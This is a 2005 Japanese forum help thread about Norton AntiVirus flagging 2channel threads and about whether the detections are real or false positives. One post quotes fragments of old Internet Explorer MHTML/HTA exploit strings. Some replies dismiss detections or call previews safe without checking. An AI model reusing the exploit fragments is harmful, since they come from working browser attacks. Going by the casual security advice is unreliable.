99:ひよこ名無しさん
05/05/22 02:28:48
>>98
そのファイルはjpgじゃなくて、exeということらしい。
誤反応ではなくて、本物。
スレを開いただけでは感染しないけど、
その画像ファイルをIEで開くと感染する可能性がある。
100:98
05/05/22 02:46:42 GqakRWGu
>>99
おそらく原因のレスは
スレリンク(entrance板:899-番)
だと思いますが、これ画像そのものはクリックしてないんですが
ただスレッドを開いた瞬間ノートン先生が激しく怒ったス
ログを見ても
アクセスが拒否されました。
修復できませんでした。
としか出てません。
最新のウィルス定義ファイルを落とさないと駆除できないみたいですが、
これは最近のということでしょうか?
そして、今自分のPCにTemporary Internet Filesや
他の場所にウィルスが潜伏してるということはないんでしょうか?それを開くとアウツみたいな。
101:ひよこ名無しさん
05/05/22 02:49:13
>>100
そこの899だよ。
でも、ノートンが隔離してるはず。
そうでなくても、IEの一時ファイルをクリアして、ごみ箱を空にするだけでいい。
102:98
05/05/22 02:51:49 GqakRWGu
>>101
レスサンクス
この.jpgブラクラは最近登場したんでしょうか
これからまた誤反応する人とかいっぱいでるんでしょうか
103:ひよこ名無しさん
05/05/22 02:52:55
>>102
だから、誤反応じゃないって言ってるのに。
104:98
05/05/22 02:57:16 GqakRWGu
モノホン反応ですか、ノートン使ってる人は
反応でますよね?どうするんでしょうかこれ
105:98
05/05/22 03:04:15
あ、ノートン使ってても
画像ポップアップ有効にしてないと意味ないのか
106:ひよこ名無しさん
05/05/22 03:05:41
>>104
Q.画像プレビューや画像ポップアップでアンチウィルスソフトが反応する事がある
A.画像プレビューも画像ポップアップもイメージタグで表示するだけなので、
仮にそれがウイルスだったとしても、あくまで画像として処理され、
ウイルスのコードが実行される事はないので安全。気にする事なし。
107:98
05/05/22 03:06:20
>>106
サンクス、どうもでした(=゚ω゚)ノシュ
108:ひよこ名無しさん
05/05/22 21:11:27 zQU5xhse
テスト
109:ひよこ名無しさん
05/05/23 00:27:44 C8+JokU/
ms-its:mhtml:file://c:\
kak.hta';ken=wdt'START
この二つに激しくノートンが反応するんですが
これも誤反応ですか?vbsとは違う種類みたいですが
110:ひよこ名無しさん
05/05/23 00:30:33
>>109
誤反応
ただの文字列では何も出来ない。
111:ひよこ名無しさん
05/05/23 00:38:46
>>110
sankusu
112:ひよこ名無しさん
05/05/23 00:39:33
>>109
113:ひよこ名無しさん
05/05/23 12:52:25
age
114:ひよこ名無しさん
05/05/23 21:27:57 AIqAZiI7
すみません。初心者スレッドから誘導されてきました。
このスレに来る時もそうでしたが、あるスレに行くと
ノートンが反応して「修復できません」と表示されます。
結果「Bloodhound.Exploit.6」を検疫することで
通常の状態に戻るようなのですが、
「Bloodhound.Exploit.6」ファイルを検疫項目の中から
右クリックで削除してもよいものでしょうか?
どなたか教えてください。お願いいたします。
115:ひよこ名無しさん
05/05/23 21:31:20
まず専ブラ入れれ
116:114
05/05/23 21:44:11 AIqAZiI7
>>115
はい。検討します。これ↓
「Bloodhound.Exploit.6」ファイルを検疫項目の中から
右クリックで削除してもよいものでしょうか?
についてはどうでしょうか?
117:ひよこ名無しさん
05/05/23 21:49:16
それはすべきじゃないから
専ブラ入れてからログのフォルダを除外設定にするのよ
このへんよめ
URLリンク(www.sannet.ne.jp)
118:114
05/05/23 22:07:32 AIqAZiI7
>>117
なるほど、そうですか。
どうもありがとうございました。
119:ひよこ名無しさん
05/05/24 11:39:34 xooP0kni
青空さんは山田砲撃たれたことないの
もういっぺん感染してほしいの
120:ノtasukeruyo
05/05/24 16:56:41 1JBRx0B0
>>117
>114と同様の警告がでます。
どういったウイルスなのでしょうか。
スレリンク(mog2板) >>4
で拾ったようなのですが
スレ違いだったらごめんなさい。
121:ひよこ名無しさん
05/05/24 16:59:06
>>120
URLリンク(www.google.co.jp)
122:120
05/05/24 17:00:31
専ブラはJane派生系使ってます
123:120
05/05/24 17:03:19
>>121
ありがとうございます。m(__)m
124:ひよこ名無しさん
05/05/25 00:18:25
先日脳豚先生が誤動作したんだけど、そんときに「Bloodhound.Exploit.6」
ってのが誤検出されたんだが、誤検出だっつってんのに
納得しないやからがいる。
どっかで↑みたいなのが検出されても誤動作だって
わかるように解説してるページない?
125:ひよこ名無しさん
05/05/25 00:22:44
>>1
126:ひよこ名無しさん
05/05/28 00:50:41 tmw7KRqu
UnixPenguinと言う名のウィルスが5/6に感染していた事が先ほどわかり
ファイルを削除 しかしパソを再起動したらそのファイルがありました
ファイルを削除したら普通消えるのでは?
5/6に感染してたって事は、20日以上気づかないで放置って事は・・・ヤバイ?
127:ひよこ名無しさん
05/05/28 00:52:54
>>126
まさか「誤反応」の意味がわからない?
128:ひよこ名無しさん
05/05/28 00:55:51 tmw7KRqu
誤反応???まじで?
アタッマきたんでまたファイル消したら完全にファイル消えたよw
129:ひよこ名無しさん
05/05/29 11:51:31
(・∀・)スンスンスーン♪
130:ひよこ名無しさん
05/05/29 11:55:12
( ゚д゚)ハッ!
131:ひよこ名無しさん
05/05/30 14:53:36
とあるスレを見ようとするとノートン先生が反応します。
ウィルス「MHTML Redir.Exploit」
実害は無い感じなので
反応したと思われるlogを削除しただけですが
これもまた誤反応なのでしょうか?
132:ひよこ名無しさん
05/05/30 14:59:34
ちなみにギコなびを使っています。
133:ひよこ名無しさん
05/05/30 18:45:45
失礼します。
IEを使用していますが、板や特定スレを開くとウイルス反応がでます。
削除しようとしても削除できないため、除外しておいていますが
問題はないんでしょうか?
削除も検疫など有効と思われることが出来ないのでしょうがなく
除外している状態です。上の方で削除のことがでてますが削除しないと問題ありますか。
134:ひよこ名無しさん
05/05/30 23:34:04
>>133
多分ウイルスに似たコードを載せている為にウイルスと誤認識して反応しているだけですよ。
135:ひよこ名無しさん
05/05/30 23:36:25
なんだか>>40と同じ症状です。
症状というのは【Unix Penguin】というウイルスコードが最近になって反応するようになりました。
専ブラのフォルダはサブフォルダ含めてAuto-Protectと手動スキャンの除外項目に確実に入っています。
その為、その場所は反応しないのですが一時ファイル(キャッシュ)の場所が反応しています。
一時フォルダも除外指定すれば簡単なんですけど、他のサイト閲覧する時とか
安置ウイルスの役割してくれないらしいので除外したくありません。
今まで一時ファイルは反応しなかったのに今更反応するのが、どうしてなのか分かりません。
専ブラはJANE使用。Norton AntiVirusは10.0.10.13gバージョン使用。
因みにOSはXPのHOMEです。アドバイスおねがいします。
136:ひよこ名無しさん
05/05/31 10:18:11
>>134
レスありがとうございます。
Auto-Protectでひっかかるんですが>>39を読むと除外でも
問題なさそうですね・・・?大丈夫かな。
ただ>>135を読むと除外もよくないみたいでどうしたらいいのかとも思う。
137:名無しさん@お腹いぱーい。
05/05/31 12:22:06 BE:1886843-#
>>135
> なんだか>>40と同じ症状です。
> 症状というのは【Unix Penguin】というウイルスコードが最近になって反応するようになりました。
> 専ブラのフォルダはサブフォルダ含めてAuto-Protectと手動スキャンの除外項目に確実に入っています。
スレッドタイトルに反応したんじゃないかな。
URLリンク(info.2ch.net)
Janeの場合はfavorites.dat
ε三(; ・∀・)鯖マデオツカイの場合result.datを除外に加えてね。
> その為、その場所は反応しないのですが一時ファイル(キャッシュ)の場所が反応しています。
> 一時フォルダも除外指定すれば簡単なんですけど、他のサイト閲覧する時とか
> 安置ウイルスの役割してくれないらしいので除外したくありません。
> 今まで一時ファイルは反応しなかったのに今更反応するのが、どうしてなのか分かりません。
> 専ブラはJANE使用。Norton AntiVirusは10.0.10.13gバージョン使用。
> 因みにOSはXPのHOMEです。アドバイスおねがいします。
ブラウザでスレを開いたんじゃないかな。
>>10で一時ファイルの削除の仕方があるので見てね。
>>136
IEの一時ファイルを除外にしないで
2ちゃんねるブラウザのログフォルダを除外にしてください。
>>135>>136
2ちゃんねるブラウザのより細かい設定はそれぞれの2ちゃんねるブラウザのスレで確認してね。
ソフトウェア
URLリンク(pc8.2ch.net)
138:ひよこ名無しさん
05/05/31 19:09:47 Smprwa5o
初歩的な質問なんですが教えてもらえませんか?
何故ノートンだけが反応するんですか?
ノートンで反応したファイルを消さず、ウィルスバスターに反応するか試しましたが、反応なしでした。
【Unix Penguin】は、ウィルスなんですよね?
なのに何故・・・?
139:ひよこ名無しさん
05/05/31 19:18:29
先生はよく間違えますが本物を逃すこともありません
次ページ最新レス表示スレッドの検索類似スレ一覧話題のニュースおまかせリスト▼オプションを表示暇つぶし2ch
4867日前に更新/242 KB
担当:undef